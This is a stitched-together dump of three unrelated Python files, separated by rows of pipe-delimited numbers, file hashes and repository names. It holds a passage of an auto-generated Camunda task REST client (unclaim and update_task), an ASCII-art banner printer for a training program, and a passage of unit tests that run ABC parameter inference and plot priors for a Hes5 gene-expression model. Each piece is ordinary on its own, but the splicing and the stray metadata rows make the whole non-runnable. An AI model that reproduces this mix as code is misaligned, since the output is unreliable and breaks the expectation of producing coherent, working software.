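# REST docs, the engine echoes the process variables back when
# `withVariablesInReturn` is set on the request body (presumably exposed
# here as `with_variables_in_return`), which is why the response type is
# dict(str, VariableValueDto):
#
#   from openapi_client.models import CompleteTaskDto, VariableValueDto
#
#   body = CompleteTaskDto(
#       variables={'amount': VariableValueDto(value=500, type='Integer')},
#       with_variables_in_return=True)
#   returned_variables = task_api.submit('aTaskId', complete_task_dto=body)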
def unclaim(self, id, **kwargs): # noqa: E501
"""unclaim # noqa: E501
Resets a task's assignee. If successful, the task is not assigned to a user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unclaim(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to unclaim. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.unclaim_with_http_info(id, **kwargs) # noqa: E501
def unclaim_with_http_info(self, id, **kwargs): # noqa: E501
"""unclaim # noqa: E501
Resets a task's assignee. If successful, the task is not assigned to a user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unclaim_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to unclaim. (required)
:param _return_http_data_only: if True, return the response data only,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method unclaim" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `unclaim`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/unclaim', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
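# Usage sketch (illustrative), also showing the async_req pattern that the
# docstrings above describe: with async_req=True the call returns a
# thread-like object whose get() blocks until the HTTP response arrives:
#
#   thread = task_api.unclaim('aTaskId', async_req=True)
#   thread.get()  # returns None once POST /task/{id}/unclaim completes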
def update_task(self, id, **kwargs): # noqa: E501
"""update_task # noqa: E501
Updates a task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_task(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to be updated. (required)
:param TaskDto task_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_task_with_http_info(id, **kwargs) # noqa: E501
def update_task_with_http_info(self, id, **kwargs): # noqa: E501
"""update_task # noqa: E501
Updates a task. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_task_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task to be updated. (required)
:param TaskDto task_dto:
:param _return_http_data_only: if True, return the response data only,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'task_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_task" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `update_task`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'task_dto' in local_var_params:
body_params = local_var_params['task_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
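# Usage sketch (illustrative). Note that this is a PUT of the whole task
# resource, so the DTO should carry every property worth keeping, not only
# the changed ones; consult the Camunda 7.13 REST docs for the exact
# override semantics:
#
#   from openapi_client.models import TaskDto
#
#   task_api.update_task('aTaskId',
#                        task_dto=TaskDto(name='My Task', priority=60))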
| 71.893979 | 902 | 0.672891 | 32,493 | 244,799 | 4.878959 | 0.019143 | 0.042591 | 0.070825 | 0.029723 | 0.991939 | 0.990343 | 0.989706 | 0.989182 | 0.986489 | 0.98271 | 0 | 0.018469 | 0.248195 | 244,799 | 3,404 | 903 | 71.9151 | 0.842926 | 0.57182 | 0 | 0.847359 | 1 | 0 | 0.260165 | 0.117149 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024956 | false | 0 | 0.002902 | 0 | 0.052815 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4bcbcf87e4fb183d23e7e22b0d56d50b5a3a1e74 | 998 | py | Python | lib_trainer/banner_info.py | lakiw/improv | 232712e3d72ecc689741bce9a2c366a9f95096dc | [
"MIT"
] | 1 | 2021-06-22T15:30:01.000Z | 2021-06-22T15:30:01.000Z | lib_trainer/banner_info.py | lakiw/improv | 232712e3d72ecc689741bce9a2c366a9f95096dc | [
"MIT"
] | null | null | null | lib_trainer/banner_info.py | lakiw/improv | 232712e3d72ecc689741bce9a2c366a9f95096dc | [
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
Contains banner ASCII art and display helpers for the training program
"""
def print_banner():
"""
ASCII art for the banner
Putting it here to make it easier to change
"""
print()
print(''' __ __''')
print(''' _____ __ __ _____ _____ ____\ \ / /''')
print('''|_ _| \/ | __ \| __ \ / __ \\\ \ / / ''')
print(''' | | | \ / | |__) | |__) | | | \\\ \/ / ''')
print(''' | | | |\/| | ___/| _ /| | | | \ / ''')
print(''' _| |_| | | | | | | \ \| |__| | \/ ''')
print('''|_____|_| |_|_|_ |_| \_\\\____/ ''')
print('''|__ __| (_) ''')
print(''' | |_ __ __ _ _ _ __ ___ _ __ ''')
print(''' | | '__/ _` | | '_ \ / _ \ '__| ''')
print(''' | | | | (_| | | | | | __/ | ''')
print(''' |_|_| \__,_|_|_| |_|\___|_| ''')
print()
| 35.642857 | 64 | 0.315631 | 45 | 998 | 4.644444 | 0.511111 | 0.62201 | 0.861244 | 1.052632 | 0.334928 | 0.334928 | 0.334928 | 0.334928 | 0.334928 | 0.334928 | 0 | 0.001767 | 0.432866 | 998 | 28 | 65 | 35.642857 | 0.367491 | 0.155311 | 0 | 0.133333 | 0 | 0.066667 | 0.656962 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | true | 0 | 0 | 0 | 0.066667 | 1 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7
4be7d919372d09360e1b745f13c53c2ff85b0a25 | 544,712 | py | Python | test/test_manning_et_al_2019/test_additional_analysis_of_hes5_system.py | kursawe/hesdynamics | e7dd743ba6fcf36bd31937ec4c2c96bd890cc606 | [
"BSD-3-Clause"
] | null | null | null | test/test_manning_et_al_2019/test_additional_analysis_of_hes5_system.py | kursawe/hesdynamics | e7dd743ba6fcf36bd31937ec4c2c96bd890cc606 | [
"BSD-3-Clause"
] | null | null | null | test/test_manning_et_al_2019/test_additional_analysis_of_hes5_system.py | kursawe/hesdynamics | e7dd743ba6fcf36bd31937ec4c2c96bd890cc606 | [
"BSD-3-Clause"
] | null | null | null |
import unittest
import os
os.environ["OMP_NUM_THREADS"] = "1"
import os.path
import sys
import matplotlib as mpl
import matplotlib.gridspec
mpl.use('Agg')
mpl.rcParams['mathtext.default'] = 'regular'
import matplotlib.pyplot as plt
font = {'size' : 10}
plt.rc('font', **font)
import numpy as np
import pandas as pd
import seaborn as sns
# import xlrd
# make sure we find the right python module
sys.path.append(os.path.join(os.path.dirname(__file__),'..','..','src'))
import hes5
class TestSimpleHes5ABC(unittest.TestCase):
def xest_make_abc(self):
## generate posterior samples
total_number_of_samples = 2000
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
use_langevin = False)
self.assertEqual(my_prior_samples.shape,
(total_number_of_samples, 4))
def xest_make_abc_on_cluster(self):
## generate posterior samples
total_number_of_samples = 20000
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 16,
number_of_cpus = 16,
use_langevin = False )
self.assertEqual(my_prior_samples.shape,
(total_number_of_samples, 4))
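# Schematically, each ABC sample generated above pairs a prior draw with
# summary statistics averaged over simulated traces; throughout this file
# the result columns are used as: 0 mean expression, 1 relative standard
# deviation, 2 period, 3 coherence, 4 mean mRNA count. A sketch with
# hypothetical helper names:
#
#   def summarise_parameter(parameter, number_of_traces = 16):
#       summaries = np.zeros((number_of_traces, 5))
#       for index in range(number_of_traces):
#           trace = simulate_hes5(parameter)              # hypothetical
#           summaries[index] = summary_statistics(trace)  # hypothetical
#       return summaries.mean(axis = 0)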
def xest_plot_abc_differently(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results')
acceptance_ratio = 0.03
total_number_of_samples = 2000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
distance_table = hes5.calculate_distances_to_data(model_results)
my_posterior_samples = hes5.select_posterior_samples( prior_samples,
distance_table,
acceptance_ratio )
self.assertEqual(my_posterior_samples.shape,
(int(round(total_number_of_samples*acceptance_ratio)), 4))
# plot distribution of accepted parameter samples
data_frame = pd.DataFrame( data = my_posterior_samples,
columns= ['transcription_rate',
'translation_rate',
'repression_threshold',
'transcription_delay'])
pairplot = sns.pairplot(data_frame)
# pairplot.map_diag(sns.kdeplot)
# pairplot.map_diag(sns.distplot, kde = False, rug = True)
# pairplot.map_offdiag(sns.kdeplot, cmap="Blues_d", n_levels=10)
# pairplot.map_offdiag(sns.jointplot )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_dots_' + str(total_number_of_samples) + '_'
+ str(acceptance_ratio) + '.pdf'))
def xest_plot_abc_in_band(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results')
acceptance_ratio = 0.03
total_number_of_samples = 2000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))
my_posterior_samples = prior_samples[accepted_indices]
# plot distribution of accepted parameter samples
data_frame = pd.DataFrame( data = my_posterior_samples,
columns= ['transcription_rate',
'translation_rate',
'repression_threshold',
'transcription_delay'])
pairplot = sns.pairplot(data_frame)
# pairplot.map_diag(sns.kdeplot)
# pairplot.map_diag(sns.distplot, kde = False, rug = True)
# pairplot.map_offdiag(sns.kdeplot, cmap="Blues_d", n_levels=10)
# pairplot.map_offdiag(sns.jointplot )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_bands_' + str(total_number_of_samples) + '_'
+ str(acceptance_ratio) + '.pdf'))
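# The selection above is rejection ABC with hard bands: a prior draw is
# kept iff its summary statistics land inside experimentally motivated
# intervals. A standalone sketch of the same mask:
#
#   def accept_in_band(prior_samples, model_results,
#                      mean_band = (55000, 65000), std_band = (0.05, 0.15)):
#       mask = ((model_results[:,0] > mean_band[0]) &
#               (model_results[:,0] < mean_band[1]) &
#               (model_results[:,1] > std_band[0]) &
#               (model_results[:,1] < std_band[1]))
#       return prior_samples[mask]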
def xest_make_langevin_abc(self):
## generate posterior samples
total_number_of_samples = 20000
# total_number_of_samples = 20
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_langevin_200reps',
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEqual(my_prior_samples.shape,
(total_number_of_samples, 4))
def xest_make_langevin_abc_different_prior(self):
## generate posterior samples
total_number_of_samples = 20000
prior_bounds = {'basal_transcription_rate' : (0,10),
'translation_rate' : (0,200),
'repression_threshold' : (0,150000),
'time_delay' : (5,40)}
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 100,
saving_name = 'sampling_results_langevin_small_prior',
prior_bounds = prior_bounds,
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEqual(my_prior_samples.shape,
(total_number_of_samples, 4))
def xest_make_abc_all_parameters(self):
## generate posterior samples
total_number_of_samples = 20000
prior_bounds = {'basal_transcription_rate' : (0,100),
'translation_rate' : (0,200),
'repression_threshold' : (0,150000),
'time_delay' : (5,40),
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
'mRNA_degradation_rate': (0.001, 0.04),
'protein_degradation_rate': (0.001, 0.04)}
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_all_parameters_200',
prior_bounds = prior_bounds,
prior_dimension = 'full',
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEqual(my_prior_samples.shape,
(total_number_of_samples, 6))
def xest_make_hill_abc(self):
## generate posterior samples
total_number_of_samples = 20000
# total_number_of_samples = 10
prior_bounds = {'basal_transcription_rate' : (0,100),
'translation_rate' : (0,200),
'repression_threshold' : (0,100000),
'time_delay' : (5,40),
'hill_coefficient': (2,7)}
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
# 'mRNA_degradation_rate': (0.001, 0.04),
# 'protein_degradation_rate': (0.001, 0.04),
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_hill',
prior_bounds = prior_bounds,
prior_dimension = 'hill',
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEqual(my_prior_samples.shape,
(total_number_of_samples, 5))
def xest_pairplot_prior(self):
total_number_of_samples = 200000
prior_bounds = {'basal_transcription_rate' : (0.1,60),
'translation_rate' : (1,40),
'repression_threshold' : (0,120000),
'time_delay' : (5,40),
'hill_coefficient': (2,6)}
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
# 'mRNA_degradation_rate': (0.001, 0.04),
# 'protein_degradation_rate': (0.001, 0.04),
prior_samples = hes5.generate_prior_samples( total_number_of_samples, True,
prior_bounds, 'hill', True)
# pairplot = hes5.plot_posterior_distributions(prior_samples)
# pairplot.savefig(os.path.join(os.path.dirname(__file__),
# 'output','pairplot_log_prior.pdf'))
prior_samples[:,2]/=10000
data_frame = pd.DataFrame( data = prior_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient'])
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(151)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,np.log10(60.0),20)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,np.log10(60.0))
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.gca().tick_params(axis='y', labelsize = 'small')
plt.gca().set_ylim(0,1.0)
plt.xticks([-1,0,1], [r'$10^{-1}$',r'$10^0$',r'$10^1$'])
# plt.yticks([])
my_figure.add_subplot(152)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,np.log10(40),20)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,np.log10(40))
plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1], [r'$10^0$',r'$10^1$'])
plt.xlabel("Translation rate \n [1/min]")
plt.gca().set_ylim(0,2.0)
# plt.yticks([])
my_figure.add_subplot(153)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
plt.gca().set_ylim(0,0.22)
plt.gca().set_xlim(0,12)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(154))
time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = time_delay_bins)
plt.gca().set_xlim(5,40)
# plt.gca().set_ylim(0,0.035)
plt.gca().set_ylim(0,0.04)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel(" Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(155))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.gca().set_ylim(0,0.35)
plt.gca().set_xlim(2,6)
plt.gca().locator_params(axis='x', tight = True, nbins=3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
# plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','fixed_prior.pdf'))
def xest_make_abc_logarithmic_prior_vary_bounds(self):
## generate posterior samples
total_number_of_samples = 20000
# total_number_of_samples = 10
prior_bounds = {'basal_transcription_rate' : (0.1,100),
'translation_rate' : (1,200),
'repression_threshold' : (0,100000),
'time_delay' : (5,40),
'hill_coefficient': (2,6)}
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
# 'mRNA_degradation_rate': (0.001, 0.04),
# 'protein_degradation_rate': (0.001, 0.04),
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_logarithmic',
prior_bounds = prior_bounds,
prior_dimension = 'hill',
logarithmic = True,
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEqual(my_prior_samples.shape,
(total_number_of_samples, 5))
def xest_make_abc_logarithmic_prior(self):
## generate posterior samples
total_number_of_samples = 200000
# total_number_of_samples = 10
prior_bounds = {'basal_transcription_rate' : (0.1,100),
'translation_rate' : (1,200),
'repression_threshold' : (0,100000),
'time_delay' : (5,40),
'hill_coefficient' : (2,6)}
# 'mRNA_degradation_rate': (np.log(2)/500, np.log(2)/5),
# 'protein_degradation_rate': (np.log(2)/500, np.log(2)/5)}
# 'mRNA_degradation_rate': (0.001, 0.04),
# 'protein_degradation_rate': (0.001, 0.04),
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_logarithmic',
prior_bounds = prior_bounds,
prior_dimension = 'hill',
logarithmic = True,
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEqual(my_prior_samples.shape,
(total_number_of_samples, 5))
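# With logarithmic = True the rate parameters are presumably drawn
# log-uniformly between their bounds, matching the log10 axes used in
# xest_pairplot_prior. A one-function sketch of log-uniform sampling:
#
#   def sample_log_uniform(lower, upper, size):
#       return 10.0**np.random.uniform(np.log10(lower), np.log10(upper), size)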
def xest_plot_larger_variation(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
model_results[:,1]>0.3))) #standard deviation
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
print('coherences are')
print(model_results[accepted_indices][:,3])
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.diag_axes[0].set_ylim(0,10)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_larger_amplitude.pdf'))
def xest_plot_smaller_mean(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>5500, #cell number
np.logical_and(model_results[:,0]<6500, #cell_number
# model_results[:,1]>0.3))) #standard deviation
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.2))))) #standard deviation
# prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
print('coherences are')
print(model_results[accepted_indices][:,3])
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.diag_axes[0].set_ylim(0,1000)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_small_mean.pdf'))
def xest_plot_large_amplitude_trace(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
model_results[:,1]>0.3))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
this_parameter = my_posterior_samples[1]
this_trace = hes5.generate_langevin_trajectory( duration = 1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
hill_coefficient = this_parameter[4],
initial_protein = this_parameter[2],
equilibration_time = 1000
)
plt.figure(figsize = (4.5,2.5))
plt.plot(this_trace[:,0], this_trace[:,2]/1e4)
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','large_amplitude_example.pdf'))
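# For orientation, hes5.generate_langevin_trajectory integrates a delayed
# chemical Langevin equation; one Euler-Maruyama step looks roughly like
# the sketch below (illustrative only, with the delayed protein copy
# number entering the repressive Hill function; see the hes5 module for
# the actual implementation):
#
#   def langevin_step(mRNA, protein, delayed_protein, dt,
#                     alpha_m, alpha_p, mu_m, mu_p, p_0, hill_coefficient):
#       hill = 1.0/(1.0 + (delayed_protein/p_0)**hill_coefficient)
#       drift_m = alpha_m*hill - mu_m*mRNA
#       drift_p = alpha_p*mRNA - mu_p*protein
#       noise_m = np.sqrt(alpha_m*hill + mu_m*mRNA)*np.random.randn()
#       noise_p = np.sqrt(alpha_p*mRNA + mu_p*protein)*np.random.randn()
#       new_mRNA = max(mRNA + drift_m*dt + noise_m*np.sqrt(dt), 0.0)
#       new_protein = max(protein + drift_p*dt + noise_p*np.sqrt(dt), 0.0)
#       return new_mRNA, new_protein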
def xest_plot_logarithmic_prior_bands(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
prior_samples[:,1]<10))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.diag_axes[0].set_ylim(0,1000)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_logarithmic_bands.pdf'))
def xest_plot_logarithmic_prior_oscillating(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.3))))) #coherence
# prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.diag_axes[0].set_ylim(0,30)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_logarithmic_oscillating.pdf'))
def xest_plot_logarithmic_prior_not_oscillating(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05,
np.logical_and(model_results[:,1]>0.05, #standard deviation
np.logical_and(prior_samples[:,1]<10, #time_delay
model_results[:,3]>0.3)))))) #coherence
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.diag_axes[0].set_ylim(0,30)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_logarithmic_not_oscillating.pdf'))
def xest_plot_period_distribution_logarithmic_prior(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
